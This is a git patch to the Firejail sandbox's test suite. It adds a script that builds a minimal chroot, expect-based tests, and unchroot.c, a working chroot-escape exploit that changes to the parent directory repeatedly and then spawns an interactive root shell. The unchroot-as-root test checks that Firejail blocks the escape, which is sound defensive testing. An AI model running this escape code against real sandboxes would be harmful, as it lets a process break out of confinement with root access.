From 80cc5fa809ebb3f213852312dea15cded00cc069 Mon Sep 17 00:00:00 2001 From: netblue30 Date: Sun, 20 Nov 2016 16:05:45 -0500 Subject: chroot testing --- test/chroot/chroot-resolvconf.exp | 14 ------------ test/chroot/chroot.sh | 21 ++++++++++++++++++ test/chroot/configure | 46 +++++++++++++++++++++++++++++++++++++++ test/chroot/fs_chroot.exp | 26 +++++----------------- test/chroot/unchroot-as-root.exp | 27 +++++++++++++++++++++++ test/chroot/unchroot.c | 40 ++++++++++++++++++++++++++++++++++ 6 files changed, 140 insertions(+), 34 deletions(-) delete mode 100755 test/chroot/chroot-resolvconf.exp create mode 100755 test/chroot/chroot.sh create mode 100755 test/chroot/configure create mode 100755 test/chroot/unchroot-as-root.exp create mode 100644 test/chroot/unchroot.c (limited to 'test/chroot') diff --git a/test/chroot/chroot-resolvconf.exp b/test/chroot/chroot-resolvconf.exp deleted file mode 100755 index 2d0da2fb0..000000000 --- a/test/chroot/chroot-resolvconf.exp +++ /dev/null @@ -1,14 +0,0 @@ -#!/usr/bin/expect -f - -set timeout 10 -spawn $env(SHELL) -match_max 100000 - -send -- "firejail --chroot=/tmp/chroot /bin/bash\r" -expect { - timeout {puts "TESTING ERROR 0\n";exit} - "invalid /tmp/chroot/etc/resolv.conf file" -} - -puts "\nall done\n" - diff --git a/test/chroot/chroot.sh b/test/chroot/chroot.sh new file mode 100755 index 000000000..34bff2a67 --- /dev/null +++ b/test/chroot/chroot.sh @@ -0,0 +1,21 @@ +#!/bin/bash +# This file is part of Firejail project +# Copyright (C) 2014-2016 Firejail Authors +# License GPL v2 + +export MALLOC_CHECK_=3 +export MALLOC_PERTURB_=$(($RANDOM % 255 + 1)) + +rm -f unchroot +gcc -o unchroot unchroot.c +sudo ./configure + +echo "TESTING: chroot (test/chroot/fs_chroot.exp)" +./fs_chroot.exp + +echo "TESTING: unchroot as root (test/chroot/unchroot-as-root.exp)" +sudo ./unchroot-as-root.exp + + + +rm -f unchroot diff --git a/test/chroot/configure b/test/chroot/configure new file mode 100755 index 000000000..ba8238803 --- /dev/null +++ b/test/chroot/configure @@ -0,0 +1,46 @@ +#!/bin/bash + +# build a very small chroot +ROOTDIR="/tmp/chroot" # default chroot directory +DEFAULT_FILES="/bin/bash /bin/sh " # basic chroot files +DEFAULT_FILES+="/etc/passwd /etc/nsswitch.conf /etc/group " +DEFAULT_FILES+=`find /lib -name libnss*` # files required by glibc +DEFAULT_FILES+=" /bin/cp /bin/ls /bin/cat /bin/ps /bin/netstat /bin/ping /sbin/ifconfig /usr/bin/touch /bin/ip /bin/hostname /bin/grep /usr/bin/dig /usr/bin/openssl /usr/bin/id /usr/bin/getent /usr/bin/whoami /usr/bin/wc /usr/bin/wget /bin/umount" + +rm -fr $ROOTDIR +mkdir -p $ROOTDIR/{root,bin,lib,lib64,usr,home,etc,dev/shm,tmp,var/run,var/tmp,var/lock,var/log,proc} +chmod 777 $ROOTDIR/tmp +mkdir -p $ROOTDIR/etc/firejail +mkdir -p $ROOTDIR/home/netblue/.config/firejail +chown netblue:netblue $ROOTDIR/home/netblue +chown netblue:netblue $ROOTDIR/home/netblue/.config +cp /home/netblue/.Xauthority $ROOTDIR/home/netblue/. +cp -a /etc/skel $ROOTDIR/etc/. +mkdir $ROOTDIR/home/someotheruser +mkdir $ROOTDIR/boot +mkdir $ROOTDIR/selinux +cp /etc/passwd $ROOTDIR/etc/. +cp /etc/group $ROOTDIR/etc/. +cp /etc/hosts $ROOTDIR/etc/. +cp /etc/hostname $ROOTDIR/etc/. +mkdir -p $ROOTDIR/usr/lib/x86_64-linux-gnu +cp -a /usr/lib/x86_64-linux-gnu/openssl-1.0.0 $ROOTDIR/usr/lib/x86_64-linux-gnu/. +cp -a /usr/lib/ssl $ROOTDIR/usr/lib/. +touch $ROOTDIR/var/log/syslog +touch $ROOTDIR/var/tmp/somefile +SORTED=`for FILE in $* $DEFAULT_FILES; do echo " $FILE "; ldd $FILE | grep -v dynamic | cut -d " " -f 3; done | sort -u` +for FILE in $SORTED +do + cp --parents $FILE $ROOTDIR +done +cp --parents /lib64/ld-linux-x86-64.so.2 $ROOTDIR +cp --parents /lib/ld-linux.so.2 $ROOTDIR +cp unchroot $ROOTDIR/. +touch $ROOTDIR/this-is-my-chroot + +cd $ROOTDIR; find . +mkdir -p usr/lib/firejail/ +cp /usr/lib/firejail/libtrace.so usr/lib/firejail/. + + +echo "To enter the chroot directory run: firejail --chroot=$ROOTDIR" diff --git a/test/chroot/fs_chroot.exp b/test/chroot/fs_chroot.exp index aeb5669e1..295ff8ff9 100755 --- a/test/chroot/fs_chroot.exp +++ b/test/chroot/fs_chroot.exp @@ -20,19 +20,14 @@ expect { sleep 1 send -- "bash\r" sleep 1 -send -- "ls /; pwd\r" +send -- "ls /\r" expect { timeout {puts "TESTING ERROR 0.2\n";exit} "this-is-my-chroot" } -expect { - timeout {puts "TESTING ERROR 0.3\n";exit} - "home" -} - +after 100 - -send -- "ps aux; pwd\r" +send -- "ps aux\r" expect { timeout {puts "TESTING ERROR 1\n";exit} "/bin/bash" @@ -45,23 +40,14 @@ expect { timeout {puts "TESTING ERROR 3\n";exit} "ps aux" } -expect { - timeout {puts "TESTING ERROR 4\n";exit} - "home" -} -sleep 1 +after 100 - -send -- "ps aux |wc -l; pwd\r" +send -- "ps aux | wc -l; pwd\r" expect { timeout {puts "TESTING ERROR 5\n";exit} "6" } -expect { - timeout {puts "TESTING ERROR 6\n";exit} - "home" -} -sleep 1 +after 100 puts "all done\n" diff --git a/test/chroot/unchroot-as-root.exp b/test/chroot/unchroot-as-root.exp new file mode 100755 index 000000000..9f8a1d784 --- /dev/null +++ b/test/chroot/unchroot-as-root.exp @@ -0,0 +1,27 @@ +#!/usr/bin/expect -f + +set timeout 10 +spawn $env(SHELL) +match_max 100000 + +send -- "firejail --chroot=/tmp/chroot\r" +expect { + timeout {puts "TESTING ERROR 0\n";exit} + "Error: --chroot option is not available on Grsecurity systems" {puts "\nall done\n"; exit} + "Child process initialized" {puts "chroot available\n"}; +} +sleep 1 + +send -- "cd /\r" +after 100 + + +send -- "./unchroot\r" +expect { + timeout {puts "TESTING ERROR 1\n";exit} + "Bad system call" +} +after 100 + +puts "all done\n" + diff --git a/test/chroot/unchroot.c b/test/chroot/unchroot.c new file mode 100644 index 000000000..1982e07f3 --- /dev/null +++ b/test/chroot/unchroot.c @@ -0,0 +1,40 @@ +// simple unchroot example from http://linux-vserver.org/Secure_chroot_Barrier +#include +#include +#include +#include +#include + +void die(char *msg) { + perror(msg); + exit(1); +} + +int main(int argc, char *argv[]) +{ + int i; + + if (chdir("/") != 0) + die("chdir(/)"); + + if (mkdir("baz", 0777) != 0) + ; //die("mkdir(baz)"); + + if (chroot("baz") != 0) + die("chroot(baz)"); + + for (i=0; i<50; i++) { + if (chdir("..") != 0) + die("chdir(..)"); + } + + if (chroot(".") != 0) + die("chroot(.)"); + + printf("Exploit seems to work. =)\n"); + + execl("/bin/bash", "bash", "-i", (char *)0); + die("exec bash"); + + exit(0); +} -- cgit v1.2.3-54-g00ecf